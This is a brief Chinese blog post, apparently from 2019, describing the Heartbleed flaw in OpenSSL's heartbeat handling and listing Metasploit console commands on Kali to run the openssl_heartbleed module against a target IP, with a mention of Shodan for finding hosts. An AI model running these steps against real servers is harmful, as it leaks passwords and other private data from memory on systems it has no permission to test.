心脏滴血与利用

心脏滴血漏洞:

OpenSSL在实现TLS和DTLS的心跳处理逻辑时,存在编码缺陷。OpenSSL的心跳处理逻辑没有检测心跳包中的长度字段是否和后续的数据字段相符合,攻击者可以利用这一点,构造异常的数据包,来获取心跳数据所在的内存区域的后续数据。这些数据中可能包含了用户名,用户密码,用户邮箱等敏感信息。该漏洞允许攻击者从内存中读取多达64KB的数据。

获取心脏出血数据:

  安装插件:shodan

  kali 运行命令

  >msfconsole

  >search heartbleed

  >use auxiliary/scanner/ssl/openssl_heartbleed

  >show options

  >set RHOSTS  xxx.xxx.xxx.xxx(IP)

  >exploit

posted @ 2019-08-19 22:25  a_pei!  阅读(520)  评论(0编辑  收藏  举报